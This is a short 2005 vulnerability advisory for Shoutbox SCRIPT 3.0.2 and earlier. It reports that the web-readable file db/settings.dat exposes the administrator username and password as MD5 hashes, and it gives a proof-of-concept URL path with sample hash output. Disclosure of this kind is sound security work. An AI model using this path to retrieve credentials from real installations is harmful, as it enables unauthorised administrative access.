Shoutbox SCRIPT <= 3.0.2 Administrative MD5 Username and Password Retrieval [x0n3-h4ck]
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Shoutbox SCRIPT <= 3.0.2 ]=-
-=[
]=-
-=[ Author: CorryL www.x0n3-h4ck.org ]=-
-=[
]=-
-=[----------------------------------------------------]=-
-=[+] Application: Shoutbox SCRIPT
-=[+] Version: 3.0.2 and prior
-=[+] Vendor's URL: http://www.knusperleicht.at
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Administrative MD5 Username and Password Retrieval
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck
..::[ Descriprion ]::..
shoutbox and' a script very simple php to be used that to install,
and' used as a glass showcase where the consumers can leave his/her own
messages
..::[ Bug ]::..
this software and' affection from a bug,
a remote attacker exploiting the possibility
has him/it' to draw sensitive information as user and administrator pass in
md5.
..::[ Proof Of Concept ]::..
http://host/patch to shout/db/settings.dat
result:
.....
....
....
$SB_ADMIN[Change_Username] = '189bbbb00c5f1fb7fba9ad9285f193d1';
$SB_ADMIN[Change_Userpass] = '81dc9bdb52d04dc20036dbd8313ed055';
..::[ Workaround ]::..
noting
..::[ Disclousure Timeline ]::..
[17/04/2005] - Vendor notification
[19/04/2005] - No patch relase from vendor
[19/04/2005] - Public disclousure
CorryL
corryl80@xxxxxxxxx
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck
_________________________________
www.seekstat.it is your web stat